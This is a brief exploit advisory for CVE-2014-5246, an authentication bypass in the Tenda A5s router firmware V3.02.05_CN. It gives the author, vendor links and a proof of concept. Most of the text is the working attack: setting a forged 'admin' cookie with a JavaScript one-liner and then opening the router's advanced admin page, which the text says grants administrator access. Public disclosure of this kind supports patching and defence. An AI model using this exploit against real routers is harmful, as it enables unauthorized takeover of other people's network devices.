27 lines
No EOL
650 B
Text
27 lines
No EOL
650 B
Text
-----------------------------------------------------------------------
|
|
Tenda A5s Router Authentication Bypass Vulnerability
|
|
-----------------------------------------------------------------------
|
|
Author : zixian
|
|
Mail : me@zixian.org
|
|
Date : Aug, 17-2014
|
|
|
|
Vendor : http://tenda.com.cn/
|
|
Link : http://tenda.com.cn/Catalog/Product/223
|
|
Version : V3.02.05_CN
|
|
CVE : CVE-2014-5246
|
|
|
|
Exploit & p0c
|
|
_____________
|
|
|
|
go to
|
|
http://192.168.2.1/
|
|
|
|
then set cookie with javascript
|
|
|
|
javascript:document.cookie='admin:language=zh-cn'
|
|
|
|
go to
|
|
http://192.168.2.1/advance.asp
|
|
|
|
you are the admin!
|
|
_____________ |